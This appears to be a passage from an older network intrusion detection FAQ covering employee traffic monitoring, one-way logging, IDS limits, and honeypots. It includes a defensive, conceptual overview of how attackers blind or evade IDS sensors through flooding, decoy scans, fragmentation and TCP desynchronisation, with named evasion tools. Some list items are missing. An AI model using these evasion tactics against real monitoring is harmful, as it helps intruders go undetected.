If you install an intrusion detection system, you WILL see intrusions on an on-going basis. In a SOHO environment, you will likely get scanned by a hacker once a week. On a well-known web-site, hackers will probe your site for vulnerabilies many times per day. On a large internal corporate network, you will find constant suspicious activities by internal employees.
The first problem that you are likely to be confronted with is employees surfing p-orn sites on the web. Just about every long-term administrator I know has interesting stories about this. Most don't care about p-orn, it just embarrassing knowing what people are up to.
It is interesting that many otherwise conservative corporations do not outright restrict such surfing -- because it is often the executives themselves that do it. Lower-level engineers detecting such activities usually fear to bring the subject up.
The next problem that engineers face is a Human Resource (HR) issue. You will find users doing things they shouldn't, so a lot of time is spent interfacing with HR working with the offending employee.
The last problem is what to do about Internet script-kiddies and hackers probing your system. Usually, a call to ISP in question or e-mail to their "abuse@" mail box suffices. Sometimes the ISP will be grateful -- because their own systems have been compromised.
Remember that even what appears to be the most egregious hack may, in fact, be innocuous, so aproach other people with dignity and respect.
However, companies do not like being in the position of being "big brother". Rules against inappropriate surfing inevitably lead to grey areas (for example: Playboy.com recently had an article on computer security, which an employee could easily have stumbled across while doing a legitimate search on the web).
Intrusion detection systems, firewalls, proxy servers, and sniffing programs can be configured to log all web surfing traffic to log files, including who accessed which websites. Most companies already have these logs, but few make use of this information. Network technicians do not want to take on the role of HR and prosecute people. (In many cases, the culprits are executives and going after them can be a career limiting move (CLM)).
One elegant solution is posting such information to a public internal website. This has been known to dramatically affect inappropriate surfing. Rather than having a central authority judging appropriateness, it leaves it up to the individual to make that judgement.
For example, section 4.3 above discusses a "network grep" system that passes network traffic through a pattern match system. Such a system could be built with some knowledge of C and a UNIX system.
Similarly, section 4.5.2 describes a PERL based system that parses log files from a firewall.
Different countries and states have different laws, but it is generally legal to monitor your OWN traffic for intrusions.
One concern that people have is that running a NIDS on a corporate network results in network managers viewing employee Internet surfing activity (sometimes network managers find top executives surfing porn sites). As the network equipement and the user's workstation belong to the company, the legal precident is that use of the corporate equipment implies consent to monitoring. However, it is recommended that companies explicitly state in employee handbooks that their network activity will be monitored. At minimum, it avoid embarrasing situations.
WORM (Write-Once-Read-Many) drives have historically been used for this purpose, but they are expensive and finnicky. They probably don't have drivers for your system, and you software is likely incompatible with them in other ways (i.e. some systems do alter the files a little bit as they create them, which doesn't work on a worm).
One problem with any system is that entropy sets in. It may be provable secure today, but it is unlikely to stay that way. For example, one technique for logging would be to employ syslog where the receiver doesn't have a TCP/IP stack but instead uses TCPDUMP to save the raw packets to a file (presumably, a utility would be run a later date to reconstruct the syslog entries). From the entropy perspective, there is no guarantee that a TCP/IP stack won't be installed during an update, or when a new person joins the team, or when machines get shuffled around.
To combat such entropy, the model system uses the "snipped-wire" approach. In this model, an extra Ethernet adapter is installed in the machine who is generating the data, and the receive wire is cut. If an accident later happens such that the extra adapter is connected to an unsecured network, then few problems are likely to result.
In much the same way, the receiving system should have only a single Ethernet adapter, and its transmit wire should be cut. It would be best to also disable the TCP/IP stack and instead force the data through packet sniffing utilities. (Yes, there are attacks that can compromise the system even when no responses are ever received).
Normal TCP/IP won't work in this scenario. You will need to hard-code the route and ARP tables on the generating machine in order to force the traffic out the one-way wire. Similarly, you will need to use special utilities on the receiving machine in order to parse incoming packets back into useful data.
UDP-based transports like 'syslog' and SNMP Traps are the most useful transports in this situation. They are easy to generate on the outgoing machine as they are built into most systems. Since responses aren't generated anyway, it doesn't hamper the normal flow of applications. Likewise, they are easy to parse back into SNMP messages or syslog files on the receiving end, or at least, it is easy to harden a TCP/IP stack to receive only those ports. At very least, TFTP or NFS can be configured to transport files to a TCP/IP stack on the other side.
One problem that goes along with this is data management. You cannot connect the data repository to a network, so anything you use to backup the system must be installed on the system itself.
Personally, the system I use is an old Pentium-90 computer with a 6-gig drive, CD-ROM writer, and a sniffing utility that dumps all the network traffic (a 416-kbps DSL connection) to packet capture files on the disk. A couple simple filters remove a lot of the bulk so downloading the latest RedHat distribution doesn't fill up the disk. I prefer this solution over actual log files because it captures absolutely everything that happens on the wire, even all numerous so-called stealth attempts.
Update: There have been suggestions made that serial links, parallel ports, and special SCSI protocols might likewise provide a logical "air-gap". This would entail a little programming on your part, but it since entropy will likely cause it to fail rather than open a vulnerability, it would be a good choice.
Primary systems such as firewalls, encryption, and authentication are rock solid. Bugs or misconfiguration often lead to problems in these systems, but the underlying concepts are "provably" accurate.
The underlying concepts bhind NIDS are not absolutely accurate. Intrusion detection systems suffer from the two problems whereby normal traffic causes many false positives (cry wolf), and careful hackers can evade or disable the intrusion detection systems. Indeed, there are many proofs that show how network intrusion detection systems will never be accurate.
This doesn't mean intrusion detection systems are invalid. Hacking is so pervasive on today's networks that people are regularly astounded when they first install such systems (both inside and outside the firewall). Good intrusion detection systems can dramatically improve the security of a site. It just needs to be remembered that intrusion detection systems are backup. The "proveably accurate" systems regularly fail (due to human error), and the "proveably incorrect" systems regularly work.
Switched networks (such as 100-mbps and gigabit Ethernet switches) poses dramatic problems to network intrusion detection systems. There is no easy place to "plug in" a sensor in order to see all the traffic.
For example, somebody on the same switched fabric as the CEO has free reign to attack the CEO's machine all day long, such as with a password grinder targetting the File and Print sharing.
There are some solutions to this problem, but not all of them are satisfactory.
The problem with tapping into the cable, especially those between switches, is that they generate huge amounts of traffic. Most NIDS cannot handle very high loads before going "blind".
Thanks to Christopher Zarcone < czarcone at acm dot org > for this info.
Network intrusion detection systems sit at centralized locations on the network. They must be able to keep up with, analyze, and store information generated by potentially thousands of machines. It must emulate the combined entity of all the machines sending traffic through its segment. Obviously, it cannot do this fully, and must take short cuts.
This section lists some typical resource issues.
When buying an IDS, ask the vendor how many packets/second the system can handle. Many vendors will try to tell you how many bits/second, but per-packet is the real performance bottleneck. Virtually all vendors can handle 100-mbps traffic using 1500-byte packets, few can handle 100-mbps traffic using 60-byte packets.
When buying an IDS, ask the vendor how many simultaneous TCP connections it can handle.
The intrusion detection system itself can be attacked in the following ways.
Network intrusion detection systems are generally built as "passive monitors" from COTS (commercial-off-the-shelf) computers. The monitors are placed alongside the networking stream, not in the middle. This means that if they cannot keep up with the high rates of traffic, they have no way to throttle it back. They must start dropping packets. This is known as trying to drink from a firehose. Few NIDS today can keep up with a fully saturated 100-mbps link (where "saturated" means average sized packets of 180 bytes, which is roughly 50,000 packets/second).
Not only will the sensor start dropping packets is cannot process, high traffic rates can completely shut down the sensor. For example, consider a sensor that can process a maximum of 20,000 frames/second. When the proferred load is 40,000 frames/second, it usually drops actual processing down to 10,000 frames/second or 5,000 frames/second, or maybe even zero. This is because frame reception and frame analysis are two different acitivities. Most architectures require the system to capture the packet even when it is too busy to analyze it, which takes even more time away from analysis.
Therefore, an intruder can attack the sensor by saturating the link. If the intruder is local, he/she can simply use a transmit program. A 400-Mhz box can fully saturate a link with 60-byte packets, breaking most IDS systems that might be attached to the system.
A remote attacker can execute smurf or fraggle attacks, likewise saturating links. It is unlikely an attacker will have a fast enough link themselves (100-mbps is quite rare) in order to be able to attack head-on in this manner.
The 'nmap' port scanning tool contains a feature known as "decoy" scans. It scans using hundreds of spoofed source addresses as well as the real IP address of the attacker. It therefore becomes an improbable task for the administrator to find discover which of the IP addresses was real, and which was one of the decoy addresses.
Any attack can be built from the same components. A massive attack with spoofed addresses can always hide a real attack inserted somewhere inside. Administrators would be hard pressed to discover the real attack inside of all that noise.
These two scenarios still retain forensics data, though. If the attacker is suspected, the data is still there to find. Another attack is to fill up event storage. When the database fills up, no more attacks will be discovered, or older attacks will be deleted. Either way, no evidence exists anywhere that will point to the intruder.
A NIDS is an extremely complex system, equivelent in complexity to an entire TCP/IP stack running numerous services. This means the NIDS is susceptible to such attacks as SYN floods and smurf attacks.
Moreover, the numerous protocols NIDS analyze leave them open to outright crashes when unexpected traffic is seen. Attackers can often buy the same intrusion detection systems used by their victim, then experiment in many ways in order to find packets that will kill the IDS. Then during the attack, the intruder kills the IDS, then continues undetected.
This section describes simple evasion tactics that fool basic intrusion detection systems. The next section will describe advanced measures.
Note that fragmenting the IP packets in the middle of the TCP header has long been used to evade firewall port filtering.
Some industrial grade NIDS can reassemble traffic. Also, some firewalls can "normalize" traffic by forcing reassembly before passing the traffic through to the other end.
For example, some POP3 servers are vulnerable to a buffer overflow when a long password is entered. There exist several popular attack scripts for this vulnerability. One intrusion detection system might contain 10 patterns to match match the 10 most common scripts, while another intrusion detection system looks at the password field and alarms when more than 100 bytes have been entered. The first system is easy to evade simply by changing the attack script, while the second system catches any attack on this point.
The typical example is simple changes to the URL. For example, this document can be retrieved through the URL: http://www.robertgraham.com/pubs/network-intrusion-detection.html. Even though the exact pattern has changed, the meaning hasn't been altered. A NIDS looking for the original URL on the wire won't detect this alered one unless it has anti-evasion countermeasures.
The seminal paper on network intrusion detection "evasion" was written by Thomas H. Ptacek and Timothy N. Newsham. The original PostScript version is available at http://www.aciri.org/vern/Ptacek-Newsham-Evasion-98.ps, while an HTML mirror is available at http://www.robertgraham.com/mirror/Ptacek-Newsham-Evasion-98.html. Thomas H. Ptacek claims that many/most of the commercial products still (October 1999) have serious problems in this regard. Much this this section summarizes these two papers.
These papers describe the abstract concept that the network model used by the network intrusion detection system is different than the real world.
For example, an intruder might send a TCP FYN packet that the NIDS sees, but which the victim host never sees. This causes the NIDS to believe the connection is closed, but when in fact it isn't. Since TCP connections do not send "keep-alives", the intruder could wait hours or days after this "close" before continuing the attack. In practice, most interesting services do kill the connection after a certain time with no activity, but the inruder still can cause a wait of several minutes before continuing.
The first such attack is to find a way to pass packets as far as the NIDS, but cause a later router to drop packets. This depends upon the router configuration, but typical examples include low TTL fields, fragmentation, source routing, and other IP options. If there is a slow link past the NIDS, then the hacker can flood the link with high priority IP packets, and send the TCP FIN as a low priority packet -- the router's queuing mechanism will likely drop the packet.
Another approach is to consider what the host will or will not accept. For example, different TCP stacks behave differently to slightly invalid input (which programs like 'nmap' and 'queso' use to fingerprint operating systems). Typical ways of causing different traffic to be accepted/rejected is to send TCP options, cause timeouts to occur for IP fragments or TCP segments, overlap fragments/segments, send slight wrong values in TCP flags or sequence numbers.
The Ptacek/Newsham paper concentrated on IP fragmentation and TCP segmentation problems in order to highlight bugs in IDSs. For example, they noted that if overlapping fragments are sent with different data, some systems prefer the data from the first fragment(WinNT, Solaris), whereas others keep the data from the last fragment (Linux, BSD). The NIDS has no way of knowing which the end-node will accept, and may guess wrong.
Their TCP connection analysis was even more in depth, discussing ways of "de-synchronizing" TCP connections, which are much more fragile than one would think. Again, the IDS cannot correctly model all possible TCP/IP stack behavior and figure out what the end-node will accept as data. TCP also has the overlap problems that IP fragmentation has. For example, intrusion detection systems might accept the first segment and ignore later segments, but most hosts accept the later segmetns.
They ran tests against various intrusion detection systems in order to figure out if they could evade intrusion detection systems. Their results were dismal -- one major intrusion detection system could be completely evaded simply by fragmenting packets, others could be thrown off by "desynchronizing" from the data the end-node would accept.
Scans websites looking for vulnerable CGI programs. Contains over 10 different IDS-evasion techniques that either change the URL being scanned, or alters the HTTP protocol itself.
Contains the "fragrouter" that forces all traffic to fragment, which demonstrates how easy it is for hackers/crackers to do the same in order to evade intrusion detection. This accepts incoming traffic then fragments it according to various rules (IP fragmentation with various sizes and overlap, TCP segmentation again with various sizes and overlaps, TCP insertion in order to de-synchronize the connection, etc.).
Also contains the "tcpreplay" program, which dumps high loads onto an Ethernet segment in order to verify a NIDS can keep up.
Some scripts for CASL are at: http://www.roses-labs.com/labs/labs.htm
The state of standardization is extremely undeveloped at this point. The problem is that IDS sensors do not really detect intrusions. Instead, they detect evidence that indicate intrusion. This is not quite the same thing.
For example, one NIDS might detect a buffer-overflow attempt against an FTP server by tracking the length of the user name (e.g. BlackICE). Another might catalogue a list of signatures (patterns) of known exploits, and look for those patterns anywhere in the control connection (e.g. Snort). Yet others might look for typical signs of intrusions, such as a long string of x86 NOOPs in the control connection (Dragon). A host based system might detect when the FTP service crashes (which most buffer-overflow exploits cause).
The CVE effort is best thought of as a "concordance": it allows people to sync up between the various advisories and IDS/scanner checks. It solves the problem that different products detect such things differently. For example, one intrusion detection system might detect a buffer overflow by examining the length of a field, and therefore map to multiple CVE entries and advisories for different products that have buffer overflows in the same field. Likewise, another IDS system might match the signatures of specific exploits (from published scripts) of a single vulnerability.
Therefore, there might be one-to-many, many-to-one, or many-to-many mappings between any product or set of advisories. The CVE provides a concordance between various systems.
Your gameplan should consist of the following steps:
Remember: if you put one of these systems on the Internet, within a month it will be discovered and hacked.
If you need a secure system inside your company (for example, one that holds financial information), setup a similar system outside your company with bogus data. If a hacker compromises that system, you'll learn how to protect the one inside your company from similar exploits.
The San Diego Supercomputer Center has left machines up that can be hacked. http://security.sdsc.edu/incidents/worm.2000.01.18.shtml
The classic treatise on the subject is An Evening with Berferd which details how somebody setup a honeypot. http://www.all.net/books/berferd/berferd.html.
I personally have done the following sorts of things:
There are ways around this. Virtual honeypots cannot be used to launch effective attacks, and you can keep an eye on really vulnerable systems.